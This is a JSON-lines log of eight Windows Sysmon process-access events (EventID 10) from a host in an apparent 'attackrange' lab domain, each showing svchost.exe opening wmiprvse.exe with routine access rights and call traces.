{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1063,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:12.955\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F66-5F25-0000-0010B7B90100}\r\nTargetProcessId: 2812\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:12.955","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F66-5F25-0000-0010B7B90100}","TargetProcessId":"2812","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1064,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:12.955\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F66-5F25-0000-0010B7B90100}\r\nTargetProcessId: 2812\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:12.955","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F66-5F25-0000-0010B7B90100}","TargetProcessId":"2812","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1065,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:12.971\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F66-5F25-0000-0010B7B90100}\r\nTargetProcessId: 2812\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:12.971","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F66-5F25-0000-0010B7B90100}","TargetProcessId":"2812","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1066,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:12.971\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F66-5F25-0000-0010B7B90100}\r\nTargetProcessId: 2812\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:12.971","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F66-5F25-0000-0010B7B90100}","TargetProcessId":"2812","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1067,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:12.971\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F66-5F25-0000-0010B7B90100}\r\nTargetProcessId: 2812\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:12.971","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F66-5F25-0000-0010B7B90100}","TargetProcessId":"2812","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1068,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:12.987\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F66-5F25-0000-0010B7B90100}\r\nTargetProcessId: 2812\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:12.987","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F66-5F25-0000-0010B7B90100}","TargetProcessId":"2812","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1069,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:12.987\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F66-5F25-0000-0010B7B90100}\r\nTargetProcessId: 2812\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:12.987","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F66-5F25-0000-0010B7B90100}","TargetProcessId":"2812","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1070,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:12.987\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F66-5F25-0000-0010B7B90100}\r\nTargetProcessId: 2812\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:12.987","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F66-5F25-0000-0010B7B90100}","TargetProcessId":"2812","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
